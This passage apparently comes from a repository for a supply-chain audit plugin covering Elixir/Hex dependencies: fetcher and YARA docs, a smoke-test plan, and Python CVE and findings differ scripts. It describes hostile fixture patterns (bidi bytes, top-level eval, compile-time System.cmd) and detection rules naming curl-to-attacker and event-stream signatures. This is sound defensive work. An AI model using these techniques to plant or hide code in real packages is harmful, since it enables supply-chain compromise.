      AUDIT_TMPDIR="$(cat "${TMPDIR:-/tmp}/phx-audit-dir.txt")"
      cat > "${AUDIT_TMPDIR}/fetch.sh" <<EOF
      #!/bin/bash
      AUDIT_TMPDIR="${AUDIT_TMPDIR}"
      pkg="\$1"; ver="\$2"
      out="\${AUDIT_TMPDIR}/tarballs/\${pkg}/\${ver}"
      mkdir -p "\$out"
      mix hex.package fetch "\$pkg" "\$ver" --unpack -o "\$out" >/dev/null 2>&1 \\
        && echo "OK  \$pkg \$ver" || echo "ERR \$pkg \$ver"
      EOF
      chmod +x "${AUDIT_TMPDIR}/fetch.sh"
      
      jq -r '(.changed[]|"\(.[0]) \(.[2])"),(.added[]|"\(.[0]) \(.[2])")' \
        "${AUDIT_TMPDIR}/diff.json" \
        | xargs -P 4 -n 2 "${AUDIT_TMPDIR}/fetch.sh"
      ```
      
      Cap at 4 parallel fetches — `hex.pm` is fine with this and avoids
      rate-limit headers (`X-Ratelimit-Remaining`). Higher concurrency
      (`-P 8` or `-P 16`) trips Hex CDN throttling without meaningful speedup.
      
      ## Latency budget
      
      Measured on the 2026-05-12 virgil dogfood (25-package update,
      residential ISP). The ephemeral-tmpdir architecture means **every run
      pays the cold-fetch cost** — there is no on-disk cache to reuse between
      audit invocations.
      
      | Diff size | Wall time |
      |-----------|-----------|
      | 1-5 packages | 15-25s |
      | 10-25 packages | **60-90s** |
      | 50-100 packages | 3-5 min |
      | 200+ packages | 8-15 min |
      
      Earlier docs claimed 5-10 min was realistic for 25 packages and assumed
      a persistent cache could amortize the cost. That was wrong on both
      counts: the 4-way parallel fetcher is fast, and re-auditing identical
      locks is a rare workflow (people don't re-audit a lock they haven't
      touched).
      
      **Implications for UX:**
      
      - Default scan on a 25-package update completes in ~75s total. The
        user sees streaming progress (see `execution-flow.md`) so the wait
        feels active, not stalled.
      - `--quick` mode skips the tarball fetch entirely (it doesn't need
        unpacked sources — `mix_audit` and `mix hex.audit` read the lock).
        Target latency: <10s for 25 packages.
      - The `${AUDIT_TMPDIR}` is wiped on driver exit. There is no "second
        run is faster" — by design.
      
      ## No prune step
      
      Pre-Phase-5 versions of this fetcher included a `prune_cache()` walking
      `.claude/deps-audit/cache/` and removing entries older than 30 days.
      **That function is gone.** The driver's `trap "rm -rf ${AUDIT_TMPDIR}" EXIT`
      makes pruning irrelevant — every audit starts fresh and ends clean.
      
      If you're upgrading from a pre-2.12 release and `.claude/deps-audit/cache/`
      exists in your project, it's safe to delete: `rm -rf .claude/deps-audit/cache/`.
      The new code never writes there. Keep `.claude/deps-audit/last-run.json`
      and `.claude/deps-audit/policy.exs` — those are the persistent hook
      contract.
      
      ## `.gitignore` rule
      
      The `${AUDIT_TMPDIR}` lives under `${TMPDIR}` (system temp), not in the
      project tree — no .gitignore entry needed for the working artifacts.
      
      Keep `.claude/deps-audit/last-run.json` tracked? **Default: ignore.**
      It's a snapshot that becomes stale; the next audit regenerates it.
      Phase 3 PreToolUse hook reads it to detect "recently audited" but the
      file is expected to be local. `.claude/deps-audit/policy.exs` (Phase 3
      gate config) is user-owned — track or ignore per your team's policy.
      
      ## Failure modes
      
      | Failure | Behavior |
      |---------|----------|
      | Network timeout to `hex.pm` | Print warning, retry once, then BLOCK with exit 2 |
      | Package not on `hex.pm` (e.g., `:git` dep) | Skip with note, audit proceeds |
      | Disk full | Bail immediately — `mix hex.package fetch` will fail loudly |
      | Concurrent audit on same project | Each run has its own `mktemp -d`; no contention |
      | `${TMPDIR}` unwritable | Driver `mktemp -d` fails at startup, returns 2 |
      
      ## Hex API alternative (transport-only)
      
      For Mode A `--preview` we already hit `GET /api/packages/:name` for the
      latest version. The tarball is also at:
      
      ```
      https://repo.hex.pm/tarballs/<pkg>-<version>.tar
      ```
      
      But that needs manual `tar -xf` + checksum verification. Using
      `mix hex.package fetch` is one line and handles signature checking. Stick
      with mix.
      
    • testing.md 6 KB
      # Testing — Fixtures & Smoke Test
      
      The plugin has no Elixir ExUnit harness of its own (it distributes skills,
      agents, hooks — no `lib/` or `test/`). Tests for `/phx:deps-audit` rules
      live as a bash smoke-test runner that materializes synthetic fixtures and
      asserts each rule fires.
      
      ## Why heredoc fixtures, not committed `.ex` files
      
      The plugin's PostToolUse hook (`format-elixir.sh`) treats every committed
      `.ex` and `.exs` file as project source and runs `mix format
      --check-formatted` against it. Our fixtures are intentionally malformed:
      
      - Rule 1 fixture contains raw U+202E bidi bytes (Trojan Source).
      - Rule 2 fixture calls `Code.eval_string(@payload)` at module top level —
        syntactically valid but semantically hostile.
      - Rule 5 fixture pair carries an added `:git` dep that should be flagged.
      
      Committing these would (a) flag the plugin's own format hook on every
      write and (b) imply the plugin authors endorse the code as exemplary
      Elixir. Both bad. Storing the fixture content as `setup.sh` heredocs
      under `smoke-test/fixtures.d/<name>/` keeps them version-controlled
      without polluting the plugin's lint surface.
      
      ## Harness layout (Phase 2)
      
      The harness lives in the plugin repo at `lab/deps-audit/`, outside the
      installed skill, so plugin installs and generated targets never ship it.
      
      ```
      lab/deps-audit/
      ├── smoke-test/
      │   ├── runner.sh             # driver — loads every fixtures.d/<name>/
      │   ├── lib/detectors.sh      # shared rule detectors (perl/grep/awk)
      │   ├── fixtures.d/<name>/    # one dir per fixture
      │   │   ├── setup.sh          # heredoc'd fixture content, writes into $FIXTURE_DIR
      │   │   └── expected.txt      # rule:N op:>= count:1 assertions
      │   └── corpus.d/             # real-package lists (benign-100, EEF CNA CVEs)
      ├── test-assets/hex-api-cassettes/   # recorded hex.pm responses (Rules 6 + 8)
      └── capture.sh                # cassette capture helper
      ```
      
      Real tarballs for `corpus.d/` lists are fetched by the skill's runtime
      loader, `scripts/fetch_tarball.sh`.
      
      `runner.sh` discovers fixtures automatically — drop a new directory in
      `fixtures.d/` and it runs next pass.
      
      ## Running the smoke test
      
      ```bash
      bash lab/deps-audit/smoke-test/runner.sh
      ```
      
      Expected output (~1 second):
      
      ```
      Running 7 fixture(s) under .../fixtures.d:
        ok 00_clean rule:1 == 0 (got 0)
        ok 00_clean rule:2 == 0 (got 0)
        ok 00_clean rule:3 == 0 (got 0)
        ok 00_clean rule:4 == 0 (got 0)
        ok 00_clean rule:7 == 0 (got 0)
        ok 01_bidi rule:1 >= 1 (got 1)
        ok 02_eval rule:2 >= 1 (got 1)
        ok 03_compile_exec rule:3 >= 1 (got 1)
        ok 04_binary_to_term rule:4 >= 1 (got 1)
        ok 05_git_dep rule:5 >= 1 (got 1)
        ok 07_base64 rule:7 >= 1 (got 1)
      
      smoke: 7 pass, 0 fail
      ```
      
      Exit `0` = all pass. Exit `1` with `fail` lines otherwise.
      
      ## Coverage matrix
      
      | Rule | Fixture | Detector under test | Asserts |
      |------|---------|---------------------|---------|
      | Rule 1 (bidi) | `01_bidi/` — file with raw U+202E byte | perl `[\x{202A}-\x{202E}\x{2066}-\x{2069}\x{200E}\x{200F}\x{061C}]` | ≥1 finding |
      | Rule 2 (eval) | `02_eval/` — top-level `Code.eval_string(@payload)` | grep `^[[:space:]]*Code\.eval_(string\|quoted)\(` | ≥1 finding |
      | Rule 3 (compile exec) | `03_compile_exec/` — `System.cmd` inside `__before_compile__` | awk scope tracker | ≥1 finding |
      | Rule 4 (binary_to_term) | `04_binary_to_term/` — `:erlang.binary_to_term(blob)` | grep `:erlang\.binary_to_term\([^,]+\)\s*$` | ≥1 finding |
      | Rule 5 (new :git dep) | `05_git_dep/{old,new}` — new `git:` keyword | grep diff of `git:` count | ≥1 new dep |
      | Rule 7 (base64) | `07_base64/` — 308-char base64 literal | perl `"[A-Za-z0-9+/]{256,}={0,2}"` | ≥1 finding |
      | All | `00_clean/` — benign module | All 5 single-tarball rules | 0 findings each |
      
      **Rules 6 and 8 are not smoke-tested** — both require live Hex API calls
      and would make the smoke flaky/slow. They have unit-test stubs in
      `references/hex-api.md` (synthetic JSON fixtures for the parser, no
      network). Phase 2 will add VCR-style HTTP cassettes for full coverage.
      
      ## Detectors in the smoke test vs full `rules-impl.md`
      
      The smoke test uses **lightweight detector approximations** (single-line
      grep/perl/awk patterns) for speed. The full detectors in `rules-impl.md`
      use AST walks (`Code.string_to_quoted/2`) and richer scope tracking —
      they're more accurate but require a working Mix install. The smoke test's
      job is to catch regressions in the *fixture shape* (e.g., did we accidentally
      strip the bidi byte during a refactor?), not to validate the AST detectors
      themselves.
      
      When AST-detector behaviour is in question, run the deps-audit skill
      against a real `mix.lock` change and compare output to the smoke
      detectors. Discrepancies that favour the AST detector are usually correct;
      discrepancies that favour the smoke detector are usually bugs in the AST
      detector worth fixing.
      
      ## When to update fixtures
      
      - A new rule lands → add a new `fixtures.d/<NN>_<name>/` directory with
        `setup.sh` + `expected.txt`. Runner picks it up automatically.
      - An existing detector changes its output shape → adjust the
        `expected.txt` assertion, not the fixture, unless the fixture itself
        no longer represents the hostile pattern.
      - A detector emits unexpected findings on `00_clean/` → that's a false
        positive regression. Investigate before relaxing the assertion.
      
      ## Phase 2 test plan
      
      - VCR cassettes for Rules 6 and 8 (Hex API).
      - Real malicious-package replay fixtures (synthetic but modelled on
        axios / event-stream patterns).
      - FP audit on the top-50 most-installed Hex packages (manual review of
        clean output — listed in plan success criteria).
      - Property-based testing for the rule combiner using StreamData (would
        need an Elixir test harness for the plugin, deferred).
      
      ## CI integration
      
      For now the smoke test is run manually. To wire into the eval pipeline,
      add a `smoke` target in `Makefile` whose recipe runs `runner.sh` from
      the harness root. Deferred until corpus fetch from `scripts/fetch_tarball.sh`
      is reliable enough for CI gating (it depends on hex.pm reachability).
      
    • trusted-publishers.md 3.2 KB
      # Hex.pm trusted-publishers — upstream tracking and plugin stance
      
      Hex.pm has an open issue tracking server-side provenance attestation
      for package releases — analogous to npm's "provenance" or PyPI's
      trusted-publishers feature.
      
      - Upstream issue: <https://github.com/hexpm/hexpm/issues/1193>
      - EEF Ægis roadmap: <https://security.erlef.org/aegis/roadmap/hex-vulnerability-handling.html>
      
      When this lands, the plugin can defer registry-level provenance checks
      to Hex.pm itself rather than reproducing them client-side.
      
      ## Plugin stance
      
      Phase 1+2+3 work assumes **no registry-side attestation**. Every audit
      runs locally against tarball contents because that's the only signal
      available today. As soon as Hex.pm publishes a trusted-publishers API,
      the plugin adopts a hybrid model:
      
      1. **Prefer registry signal.** A package with a verified trusted
         publisher (e.g., release built and signed by a GitHub Actions
         workflow on `main`) gets a positive trust signal — comparable to
         `:safe_to_run` in the `hex_vet.exs` ledger.
      2. **Keep tarball rules as the floor.** Tarball-level audit stays
         primary for packages without trusted-publisher attestation, and
         for defense-in-depth even on attested packages — registry-side
         verification doesn't catch a malicious build pipeline.
      3. **Surface attestation gap as a finding.** Once a meaningful share
         of the ecosystem adopts trusted publishers, packages WITHOUT
         attestation become the outliers worth flagging.
      
      ## Placeholder rule
      
      When the API ships, register a new rule slot:
      
      ```text
      Rule 9 — Missing trusted-publisher attestation (INFO → WARN over time)
        Method: Hex API `/api/packages/:name/releases/:version` reads the
                `provenance` field (or equivalent).
        Severity: INFO until adoption > 20% of top-500; WARN after.
        False positives: dropped before adoption threshold; the absence
                isn't useful signal until most packages do attest.
      ```
      
      The placeholder lives here, not in `heuristics.md`, until the upstream
      API contract stabilizes. Adding it prematurely would lock the plugin
      into a guessed schema.
      
      ## Decision log
      
      The Phase 2 corpus review (2026-05-12) noted: **zero verified
      maintainer-account compromises** in the Hex ecosystem. Trusted
      publishers reduce the attack surface for the class of compromise the
      plugin protects against — when registry-side attestation exists, the
      client-side maintainer-change rule (rule 6) becomes a sanity check
      rather than a primary defense.
      
      This is good news for everyone except the plugin's value proposition.
      We track upstream because: (a) if attestation ships before an
      incident, Phase 3's hook value-prop narrows; (b) when it ships, the
      plugin should adopt — not compete — to stay aligned with where the
      ecosystem is heading.
      
      ## Action items (gated on upstream)
      
      - [ ] Watch hexpm#1193 for API design merge
      - [ ] When API merges, implement Rule 9 placeholder against staging
      - [ ] When >20% of top-500 attest, promote Rule 9 to WARN default
      - [ ] When >80% of top-500 attest, reconsider whether tarball rules
        are still worth the wall-time cost on attested packages
      
      No action is required from plugin users today. This doc exists so
      contributors and downstream-aware users know the plugin's roadmap
      intersects upstream registry work.
      
    • yara.md 4.8 KB
      # YARA byte-pattern layer — optional defense in depth
      
      YARA scans unpacked tarballs for byte-pattern signatures that are
      cheaper to detect as byte-scans than as AST walks: large base64
      blobs, embedded BEAM bytecode, gzip/zip magic in source files,
      cross-ecosystem attack signatures translated from npm.
      
      ## Iron Laws
      
      1. **SOFT DEPENDENCY.** If `yara` is absent, skip the layer with an
         install hint to stderr. Never block the audit on its absence.
      2. **DEFENSE IN DEPTH.** YARA findings stack on native + Semgrep
         findings. Cross-ecosystem signatures (event-stream, flatmap-stream,
         XZ-style magic) live here precisely because AST detectors don't
         see byte patterns inside string literals.
      3. **`yara` IS THE ONLY SUPPORTED BINARY.** Not `yara-x` (Rust port,
         different rule semantics). The plugin's starter rules target
         YARA 4.x. Test compatibility before swapping engines.
      4. **NORMALIZE TO PHASE 1 SHAPE.** YARA findings parse into NDJSON
         with `rule_id` namespaced as `yara/<rule_name>`. Severity comes
         from the rule's `meta.severity` field.
      
      ## Starter rules — `priv/yara/hex-malware.yar`
      
      The shipped starter file has 6 rules:
      
      | Rule | Severity | Purpose |
      |------|----------|---------|
      | `large_base64_blob` | warn | Base64 ≥256 chars — faster than perl regex |
      | `beam_magic_in_source` | block | BEAM bytecode magic `FOR1` inside source |
      | `gzip_magic_in_source` | warn | Gzip magic — embedded payload |
      | `zip_magic_in_source` | warn | Zip magic — embedded payload |
      | `event_stream_flatmap_signature` | warn | npm event-stream attack literal |
      | `curl_attacker_pattern` | warn | curl + http:// (non-TLS) URL pattern |
      
      All rules emit through the metadata's `rule_id` and `severity`
      fields so the parser stays generic.
      
      ## Subprocess invocation
      
      ```bash
      run_yara() {
        local tarball_dir="$1"
        command -v yara >/dev/null 2>&1 || {
          echo "yara: not installed (skipping). Install via 'brew install yara'." >&2
          return 0
        }
        # -r recursive, -s show matched strings, -m show metadata.
        yara -r -s -m \
          "${CLAUDE_SKILL_DIR}/priv/yara/hex-malware.yar" \
          "${tarball_dir}" 2>/dev/null \
        | parse_yara_output_to_ndjson
      }
      
      parse_yara_output_to_ndjson() {
        # YARA output format (line-oriented):
        #   <rule_name> [meta1="val",meta2="val"] <file_path>
        #   0x<offset>:$<string_id>: <string_content>
        #
        # Group rule + per-match lines; emit one NDJSON per match.
        local current_rule="" current_file="" current_meta="{}"
        while IFS= read -r line; do
          if [[ "${line}" =~ ^([a-z_][a-z0-9_]*)\ \[(.+)\]\ (.+)$ ]]; then
            current_rule="${BASH_REMATCH[1]}"
            current_meta="${BASH_REMATCH[2]}"
            current_file="${BASH_REMATCH[3]}"
          elif [[ "${line}" =~ ^0x[0-9a-f]+: ]]; then
            # severity comes from metadata 'severity="..."'.
            local severity=warn
            [[ "${current_meta}" =~ severity=\"([^\"]+)\" ]] && severity="${BASH_REMATCH[1]}"
            jq -n -c \
              --arg pkg "${PKG}" --arg version "${VER}" \
              --arg rule_id "yara/${current_rule}" \
              --arg severity "${severity}" \
              --arg file "${current_file}" \
              --arg snippet "${line:0:200}" \
              --arg message "YARA: ${current_rule}" \
              '{pkg:$pkg, version:$version, rule_id:$rule_id, severity:$severity,
                file:$file, line:null, snippet:$snippet, message:$message}' \
            >> "${FINDINGS_FILE:-${AUDIT_TMPDIR}/findings.jsonl}"
          fi
        done
      }
      ```
      
      YARA emits `file:line` only for hex offsets, not source lines —
      matches get `line: null`. The renderer handles null line numbers (it
      already does for Rules 6 + 8).
      
      ## Severity from metadata
      
      YARA's compiled rules don't carry severity natively. We use a
      `meta.severity` string ("block" / "warn" / "info") parsed by the
      NDJSON normalizer. Rules without a severity meta default to "warn".
      
      ## Performance
      
      YARA is fast — typical run is <500ms per package for the starter
      set. Negligible vs. the 5s Semgrep adds. Both layers can run in
      parallel with the native rule loop via shell backgrounding.
      
      ## When NOT to enable YARA
      
      - Air-gapped CI without `yara` installed and no network to fetch it
        — let the soft-dep skip take care of it.
      - Codebases with large legitimate binary blobs (e.g., embedded
        graphics in `priv/static/`). YARA's magic-byte rules trip on
        those — the existing path-exclude logic (skip `priv/`, `assets/`,
        `test/fixtures/`) should cover it, but verify on first run.
      
      ## Rule growth roadmap
      
      1. **XZ-style backdoor markers** — pull from public IoC feeds when
         YARA-format rules become available.
      2. **Macro-bytecode in string literals** — Erlang `.beam` magic
         variants beyond the `FOR1` header.
      3. **Reflection-loader strings** — `:code.load_binary`,
         `Module.create` with non-literal args (also caught by AST rules,
         but cheaper here for first-pass triage).
      
      Each new rule MUST have a synthetic fixture in
      `lab/deps-audit/smoke-test/fixtures.d/` + an entry in the table above.
      
  • scripts
    • diff_cves.py 8.9 KB
      #!/usr/bin/env python3
      """
      diff_cves.py — CVE set difference for /phx:deps-audit differential pass.
      
      Reads cves_old.json and cves_new.json (produced by mix_audit_diff in
      references/external-tools.md) and categorizes CVEs into three sets:
      
        - patched:       in OLD, not in NEW (the security changelog)
        - introduced:    in NEW, not in OLD (regression — block)
        - still_exposed: in both           (didn't fix it — block)
      
      Input shape (mix_audit JSON):
      
          {
            "pass": false,
            "vulnerabilities": [
              {
                "advisory": {
                  "id": "GHSA-xxxx-xxxx-xxxx",
                  "cve": "CVE-2026-12345",
                  "title": "...",
                  "description": "...",
                  "severity": "high",
                  "patched_versions": "~> 1.2.3",
                  "disclosure_date": "2026-05-07"  // optional
                },
                "dependency": {"package": "decimal", "version": "2.3.0"}
              }
            ]
          }
      
      Keying: (ghsa_id, package). Version is intentionally NOT part of the
      key — a CVE that affected OLD 2.3.0 and ALSO affects NEW 2.4.0 is
      "still exposed", regardless of version drift.
      
      Output (NDJSON, one finding per line):
      
          {
            "category": "patched" | "introduced" | "still_exposed",
            "rule_id": "ext:mix-audit:diff",
            "severity": "block" | "warn" | "info",
            "ghsa_id": "GHSA-xxxx-xxxx-xxxx",
            "cve_id": "CVE-2026-12345",
            "package": "decimal",
            "old_version": "2.3.0",     // null when category == "introduced"
            "new_version": "3.1.0",     // null when category == "patched"
            "severity_label": "high",
            "title": "Decimal DoS via unbounded exponent",
            "disclosed_at": "2026-05-07",
            "exposure_days": 5,
            "message": "decimal 2.3.0 → 3.1.0: CVE-2026-32686 (high) ..."
          }
      
      Severity mapping per category:
        - patched     → info  (informational — the update is the fix)
        - introduced  → block (the update regressed security)
        - still_exposed → block (update didn't address the CVE)
      
      The renderer (references/output-renderer.md) lifts patched findings to
      the headline section despite their low severity.
      
      Usage:
          python3 diff_cves.py \\
            --old cves_old.json \\
            --new cves_new.json \\
            --out diff_cves.jsonl
      """
      
      from __future__ import annotations
      
      import argparse
      import json
      import sys
      from datetime import date, datetime
      from pathlib import Path
      from typing import Any, Iterable
      
      
      def _normalize_severity(raw: str | None) -> str:
          if not raw:
              return "moderate"
          s = raw.lower().strip()
          if s in {"critical"}:
              return "critical"
          if s in {"high"}:
              return "high"
          if s in {"medium", "moderate"}:
              return "moderate"
          if s in {"low"}:
              return "low"
          return s
      
      
      def _patched_severity(category: str, raw_sev: str) -> str:
          """Map mix_audit severity → deps-audit severity per category.
      
          patched     → info  (the update IS the fix; informational)
          introduced  → block (regression — block the update)
          still_exposed → block (didn't fix it — block until further update)
          """
          if category == "patched":
              return "info"
          if raw_sev in {"critical", "high"}:
              return "block"
          if raw_sev == "moderate":
              return "warn"
          return "info"
      
      
      def _key(vuln: dict[str, Any]) -> tuple[str, str]:
          advisory = vuln.get("advisory", {}) or {}
          dependency = vuln.get("dependency", {}) or {}
          ghsa_id = advisory.get("id") or advisory.get("cve") or ""
          package = dependency.get("package") or ""
          return (ghsa_id, package)
      
      
      def _exposure_days(disclosed_at: str | None) -> int | None:
          if not disclosed_at:
              return None
          try:
              d = datetime.strptime(disclosed_at, "%Y-%m-%d").date()
          except ValueError:
              return None
          delta = date.today() - d
          return max(delta.days, 0)
      
      
      def _load_vulns(path: Path | None) -> list[dict[str, Any]]:
          if path is None or not path.exists():
              return []
          try:
              data = json.loads(path.read_text(encoding="utf-8"))
          except json.JSONDecodeError as e:
              print(f"diff_cves: invalid JSON in {path}: {e}", file=sys.stderr)
              return []
          if isinstance(data, list):
              return data  # already a list of vulns
          return data.get("vulnerabilities", []) or []
      
      
      def _build_finding(
          category: str,
          vuln_old: dict[str, Any] | None,
          vuln_new: dict[str, Any] | None,
      ) -> dict[str, Any]:
          # Prefer NEW for introduced/still_exposed (current state), OLD for
          # patched (what got fixed).
          primary = vuln_new if vuln_new and category != "patched" else (
              vuln_old or vuln_new or {}
          )
          advisory = primary.get("advisory", {}) or {}
      
          old_dep = (vuln_old or {}).get("dependency", {}) or {}
          new_dep = (vuln_new or {}).get("dependency", {}) or {}
      
          package = old_dep.get("package") or new_dep.get("package") or ""
          old_version = old_dep.get("version")
          new_version = new_dep.get("version")
          disclosed_at = advisory.get("disclosure_date") or advisory.get("disclosed_at")
      
          ghsa_id = advisory.get("id") or ""
          cve_id = advisory.get("cve") or ""
          raw_sev = _normalize_severity(advisory.get("severity"))
          severity = _patched_severity(category, raw_sev)
          title = advisory.get("title") or ""
      
          # Compose a human-readable message tailored per category.
          if category == "patched":
              message = (
                  f"{package} {old_version} → {new_version}: "
                  f"{cve_id or ghsa_id} ({raw_sev}) — {title}"
              )
          elif category == "introduced":
              message = (
                  f"REGRESSION: {package} {new_version} introduces "
                  f"{cve_id or ghsa_id} ({raw_sev}) — {title}"
              )
          else:  # still_exposed
              delta = (
                  f"{old_version} → {new_version}"
                  if old_version and new_version and old_version != new_version
                  else (new_version or old_version or "")
              )
              message = (
                  f"STILL EXPOSED: {package} {delta} remains vulnerable to "
                  f"{cve_id or ghsa_id} ({raw_sev}) — {title}"
              )
      
          finding = {
              "category": category,
              "rule_id": "ext:mix-audit:diff",
              "severity": severity,
              "ghsa_id": ghsa_id,
              "cve_id": cve_id,
              "package": package,
              "old_version": old_version,
              "new_version": new_version,
              "severity_label": raw_sev,
              "title": title,
              "disclosed_at": disclosed_at,
              "exposure_days": _exposure_days(disclosed_at),
              "message": message,
          }
          return finding
      
      
      def diff_cves(
          old: list[dict[str, Any]], new: list[dict[str, Any]]
      ) -> list[dict[str, Any]]:
          old_by_key = {_key(v): v for v in old}
          new_by_key = {_key(v): v for v in new}
      
          findings: list[dict[str, Any]] = []
      
          for key, vuln in old_by_key.items():
              if not key[0]:  # skip vulns with no GHSA/CVE id
                  continue
              if key in new_by_key:
                  findings.append(_build_finding("still_exposed", vuln, new_by_key[key]))
              else:
                  findings.append(_build_finding("patched", vuln, new_by_key.get(key)))
      
          for key, vuln in new_by_key.items():
              if not key[0]:
                  continue
              if key not in old_by_key:
                  findings.append(_build_finding("introduced", None, vuln))
      
          # Stable sort: patched first (headline), then introduced/still_exposed
          # (blockers), each group sorted by package then ghsa_id.
          category_order = {"patched": 0, "introduced": 1, "still_exposed": 2}
          findings.sort(
              key=lambda f: (category_order.get(f["category"], 9), f["package"], f["ghsa_id"])
          )
          return findings
      
      
      def write_ndjson(path: Path, rows: Iterable[dict[str, Any]]) -> int:
          path.parent.mkdir(parents=True, exist_ok=True)
          n = 0
          with path.open("w", encoding="utf-8") as fh:
              for r in rows:
                  fh.write(json.dumps(r, separators=(",", ":")) + "\n")
                  n += 1
          return n
      
      
      def main(argv: list[str]) -> int:
          p = argparse.ArgumentParser(description="CVE set difference for deps-audit")
          p.add_argument("--old", required=True, help="cves_old.json from mix_audit")
          p.add_argument("--new", required=True, help="cves_new.json from mix_audit")
          p.add_argument("--out", default="diff_cves.jsonl", help="NDJSON output path")
          p.add_argument(
              "--summary",
              action="store_true",
              help="print a one-line summary to stderr (count per category)",
          )
          args = p.parse_args(argv)
      
          old = _load_vulns(Path(args.old))
          new = _load_vulns(Path(args.new))
          findings = diff_cves(old, new)
          n = write_ndjson(Path(args.out), findings)
      
          if args.summary:
              counts = {"patched": 0, "introduced": 0, "still_exposed": 0}
              for f in findings:
                  counts[f["category"]] = counts.get(f["category"], 0) + 1
              print(
                  f"diff_cves: {n} findings — patched={counts['patched']} "
                  f"introduced={counts['introduced']} "
                  f"still_exposed={counts['still_exposed']}",
                  file=sys.stderr,
              )
          return 0
      
      
      if __name__ == "__main__":
          sys.exit(main(sys.argv[1:]))
      
    • diff_findings.py 7.8 KB
      #!/usr/bin/env python3
      """
      diff_findings.py — NDJSON set-subtract for /phx:deps-audit differential mode.
      
      Reads two findings.jsonl streams (NEW and OLD) and emits three NDJSON
      streams: signals that are new in this version, signals shared across
      both versions (downgraded to INFO), and signals dropped since OLD.
      
      Keying is polymorphic per rule:
      
        - Rules 1, 2, 3, 4, 7 (file-scoped):
            (rule_id, file, fn_name, sha256(snippet)[:12])
        - Rule 5 (mix.exs dep diff):
            (rule_id, dep_name, kind)        # kind ∈ {git, path}
        - Rules 6, 8 (package-scoped):
            (rule_id, pkg)
      
      Added-package mode: when --old is omitted or empty, every NEW finding is
      emitted as a new signal (no subtraction). This matches Phase 1 behavior
      and is the documented decision for net-new dependencies.
      
      Cache invalidation: the caller is responsible for namespacing the cache
      by a rules-checksum (sha256 of references/rules-impl.md mtime + commit
      SHA). This script is content-pure and does not maintain its own cache.
      
      Usage:
          python3 diff_findings.py --new findings.jsonl --old findings.old.jsonl \\
              --new-out new_signals.jsonl --info-out info_signals.jsonl \\
              --dropped-out dropped_signals.jsonl
      """
      
      from __future__ import annotations
      
      import argparse
      import hashlib
      import json
      import re
      import sys
      from pathlib import Path
      from typing import Any, Iterable
      
      
      FILE_SCOPED_RULES = {1, 2, 3, 4, 7}
      MIX_EXS_RULE = 5
      PACKAGE_SCOPED_RULES = {6, 8}
      
      
      def sha12(s: str) -> str:
          return hashlib.sha256((s or "").encode("utf-8")).hexdigest()[:12]
      
      
      # Match `def`, `defp`, `defmacro`, `defmacrop` with their name. The AST
      # walk in rule emitters is preferred (see `fn_name_for_line` notes in
      # differential.md), but this regex walk is the portable fallback when no
      # Elixir tooling is present.
      _FN_DEF = re.compile(
          r"^\s*(?:def|defp|defmacro|defmacrop)\s+([a-z_][A-Za-z0-9_?!]*)"
      )
      
      
      def fn_name_for_line(source_lines: list[str], line_no: int) -> str:
          """Walk upward from line_no to find enclosing named function.
      
          Falls back to 'module_scope' for top-level code (no enclosing def)
          or 'anonymous' for code inside an anonymous fn. The differ favors
          stability over precision — even an approximate function name is a
          better stability anchor than line number alone.
          """
          if not source_lines or line_no < 1:
              return "module_scope"
          for i in range(min(line_no, len(source_lines)) - 1, -1, -1):
              m = _FN_DEF.match(source_lines[i])
              if m:
                  return m.group(1)
          return "module_scope"
      
      
      def finding_key(finding: dict[str, Any]) -> tuple:
          """Polymorphic key for set-subtraction.
      
          Phase 1 emitters do not write fn_name. When unset, we derive it
          cheaply from snippet text only — full AST walks happen in the
          rule layer, not here.
          """
          rule_id = finding.get("rule_id")
          if rule_id in FILE_SCOPED_RULES:
              snippet = finding.get("snippet", "") or ""
              fn_name = finding.get("fn_name") or _approx_fn_from_snippet(snippet)
              return (
                  "file",
                  rule_id,
                  finding.get("file", ""),
                  fn_name,
                  sha12(snippet),
              )
          if rule_id == MIX_EXS_RULE:
              return (
                  "mix",
                  rule_id,
                  finding.get("dep_name", "") or _dep_name_from_message(finding),
                  finding.get("kind", "git"),
              )
          if rule_id in PACKAGE_SCOPED_RULES:
              return ("pkg", rule_id, finding.get("pkg", ""))
          # Unknown rule_id → fall back to a conservative high-entropy key so
          # diff never silently drops signals.
          return ("unknown", rule_id, json.dumps(finding, sort_keys=True))
      
      
      def _approx_fn_from_snippet(snippet: str) -> str:
          m = _FN_DEF.match(snippet)
          return m.group(1) if m else "module_scope"
      
      
      def _dep_name_from_message(finding: dict[str, Any]) -> str:
          # Rule 5 message format: 'new :git dep "phoenix_extras"'
          msg = finding.get("message", "") or ""
          m = re.search(r'"([a-z_][a-z0-9_]*)"', msg)
          return m.group(1) if m else ""
      
      
      def load_ndjson(path: Path | None) -> list[dict[str, Any]]:
          if path is None or not path.exists():
              return []
          out: list[dict[str, Any]] = []
          with path.open("r", encoding="utf-8") as fh:
              for ln, raw in enumerate(fh, 1):
                  raw = raw.strip()
                  if not raw:
                      continue
                  try:
                      out.append(json.loads(raw))
                  except json.JSONDecodeError as e:
                      print(
                          f"diff_findings: skip {path}:{ln} (invalid JSON: {e})",
                          file=sys.stderr,
                      )
          return out
      
      
      def write_ndjson(path: Path, rows: Iterable[dict[str, Any]]) -> int:
          path.parent.mkdir(parents=True, exist_ok=True)
          n = 0
          with path.open("w", encoding="utf-8") as fh:
              for r in rows:
                  fh.write(json.dumps(r, separators=(",", ":")) + "\n")
                  n += 1
          return n
      
      
      def diff(
          new: list[dict[str, Any]], old: list[dict[str, Any]]
      ) -> tuple[list[dict[str, Any]], list[dict[str, Any]], list[dict[str, Any]]]:
          new_by_key = {finding_key(f): f for f in new}
          old_keys = {finding_key(f) for f in old}
      
          new_signals: list[dict[str, Any]] = []
          info_signals: list[dict[str, Any]] = []
          for key, f in new_by_key.items():
              if key in old_keys:
                  downgraded = dict(f)
                  downgraded["severity"] = "info"
                  downgraded["differential"] = "carried"
                  info_signals.append(downgraded)
              else:
                  promoted = dict(f)
                  promoted["differential"] = "new"
                  new_signals.append(promoted)
      
          new_keys = set(new_by_key.keys())
          dropped = []
          for f in old:
              if finding_key(f) not in new_keys:
                  d = dict(f)
                  d["differential"] = "dropped"
                  dropped.append(d)
      
          return new_signals, info_signals, dropped
      
      
      def main(argv: list[str]) -> int:
          p = argparse.ArgumentParser(description="NDJSON differential for deps-audit findings")
          p.add_argument("--new", required=True, help="findings.jsonl on NEW version")
          p.add_argument("--old", required=False, help="findings.old.jsonl on OLD version")
          p.add_argument("--new-out", default="new_signals.jsonl")
          p.add_argument("--info-out", default="info_signals.jsonl")
